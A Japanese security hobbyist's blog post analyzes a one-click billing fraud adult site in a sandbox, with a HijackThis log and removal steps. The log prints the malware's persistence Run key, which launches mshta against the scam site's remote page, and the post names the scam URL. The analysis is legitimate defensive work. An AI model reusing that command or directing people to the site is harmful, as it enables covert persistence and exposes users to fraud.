「原点回帰」懐かしきワンクリサイト ADULT COLLECTION

【スポンサーリンク】

【今日の人気記事】

皆様、こんばんは。

それでは今回の投稿にまいりましょう。

【スポンサーリンク】

?原点回帰? 懐かしきワンクリサイト ADULT COLLECTION

>ADULT COLLECTION

http://www.oxygen-tank.org/

思えば2年前、知恵袋のセキュカテに初めて参加した時マルウェアに興味を持つきっかけとなったのがワンクリウェアでした。

当時はsasi40さんのツールをご紹介させていただくことだけでした。sasi40さんのサイトを見ながらツールがワンクリサイトに対応しているかどうか確認しながら回答していたものです。hijackthisを初めて知ったのもこの頃です。

初めはログといっても何が書いてあるのかさっぱりわからず・・・。

プロセス? レジストリ?何のことやらチンプンカンプンでしたね・・・。

さて実際にアクセスしてみると・・・

20120501004552aca

動画再生を2回クリックしダウンロード画面で実行をクリック。と・・・、alyacがhtaファイルを検出するも実行をクリックしたので請求画面の表示は阻止できず・・・。残念。以下が請求画面です。

20120501004825d01

昔のADULT COLLECTIONはもっと若い女性の請求画面だったはずなのに・・・。最近のワンクリサイトは本当に・・・

熟女の画像が多い・・・

さてここでhijackthisにてログを取ります。ログは以下です。

Logfile of Trend Micro HijackThis v2.0.4 Scan saved at 0:14:16, on 2012/05/01 Platform: Windows XP SP3 (WinNT 5.01.2600) MSIE: Internet Explorer v8.00 (8.00.6001.18702) Boot mode: Normal

Running processes: C:\WINDOWS\System32\smss.exe C:\WINDOWS\system32\winlogon.exe C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\lsass.exe C:\WINDOWS\system32\svchost.exe C:\Program Files\Sandboxie\SbieSvc.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\system32\spoolsv.exe C:\Program Files\Virtual PC Integration Components\vmsrvc.exe C:\Program Files\ESTsoft\ALYac\AYRTSrv.aye C:\Program Files\ESTsoft\ALYac\AYUpdSrv.aye C:\Program Files\Secunia\PSI\PSIA.exe C:\Program Files\Secunia\PSI\sua.exe C:\WINDOWS\Explorer.EXE C:\Program Files\Virtual PC Integration Components\vmusrvc.exe C:\program files\estsoft\alyac\AYAgent.aye C:\WINDOWS\system32\ctfmon.exe C:\Program Files\Secunia\PSI\psi_tray.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\system32\conime.exe C:\WINDOWS\system32\mshta.exe C:\WINDOWS\system32\svchost.exe C:\Program Files\Sandboxie\SbieCtrl.exe C:\Documents and Settings\Administrator\デスクトップ\HijackThis.exe

F2 – REG:system.ini: UserInit=C:\WINDOWS\system32\userinit.exe,rdpinit.exe, O2 – BHO: G Data CloudSecurity Class – {AADAC261-4EE9-473A-AB95-D8E153424C38} – C:\Program Files\G Data\G Data CloudSecurity\CloudSecurityIE.dll O2 – BHO: WOT Helper – {C920E44A-7F78-4E64-BDD7-A57026E7FEB7} – C:\Program Files\WOT\WOT.dll O3 – Toolbar: G Data CloudSecurity – {AADAC261-4EE9-473A-AB95-D8E153424C38} – C:\Program Files\G Data\G Data CloudSecurity\CloudSecurityIE.dll O3 – Toolbar: WOT – {71576546-354D-41c9-AAE8-31F2EC22BF0D} – C:\Program Files\WOT\WOT.dll O4 – HKLM\..\Run: [IMJPMIG8.1] “C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE” /Spoil /RemAdvDef /Migration32 O4 – HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /SYNC O4 – HKLM\..\Run: [PHIME2002A] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /IMEName O4 – HKLM\..\Run: [VMUserServices] C:\Program Files\Virtual PC Integration Components\vmusrvc.exe O4 – HKLM\..\Run: [IMEKRMIG6.1] C:\WINDOWS\ime\imkr6_1\IMEKRMIG.EXE O4 – HKLM\..\Run: [MSPY2002] C:\WINDOWS\system32\IME\PINTLGNT\ImScInst.exe /SYNC O4 – HKLM\..\Run: [ALYac] “c:\program files\estsoft\alyac\AYLaunch.exe” /run O4 – HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe O4 – HKCU\..\Run: [SandboxieControl] “C:\Program Files\Sandboxie\SbieCtrl.exe” O4 – HKCU\..\Run: [www.adult-collection09.net] mshta http://www.oxygen-tank.org/regist2.php O4 – HKUS\S-1-5-19\..\Run: [ctfmon.exe] ctfmon.exe (User ‘LOCAL SERVICE’) O4 – HKUS\S-1-5-20\..\Run: [ctfmon.exe] ctfmon.exe (User ‘NETWORK SERVICE’) O4 – HKUS\S-1-5-18\..\Run: [ctfmon.exe] ctfmon.exe (User ‘SYSTEM’) O4 – HKUS\.DEFAULT\..\Run: [ctfmon.exe] ctfmon.exe (User ‘Default user’) O9 – Extra button: (no name) – {e2e2dd38-d088-4134-82b7-f2ba38496583} – C:\WINDOWS\Network Diagnostic\xpnetdiag.exe O9 – Extra ‘Tools’ menuitem: @xpsp3res.dll,-20001 – {e2e2dd38-d088-4134-82b7-f2ba38496583} – C:\WINDOWS\Network Diagnostic\xpnetdiag.exe O15 – ESC Trusted Zone: http://*.update.microsoft.com

>O4 – HKCU\..\Run: [www.adult-collection09.net] mshta http://www.oxygen-tank.org/regist2.php

レジストリ登録のみの初期型ワンクリウェアですね。最近ではあまり見かけなくなりましたタイプです。

該当のレジストリをhijackthisよりfixして、タスクマネージャーよりmshta.exeを停止して駆除完了。

今では何も思わなくなってしまいましたが、初めて実際に行った際ははうれしかったものです。

これからも初心を忘れずネットセキュリティに関わっていきたいと思います。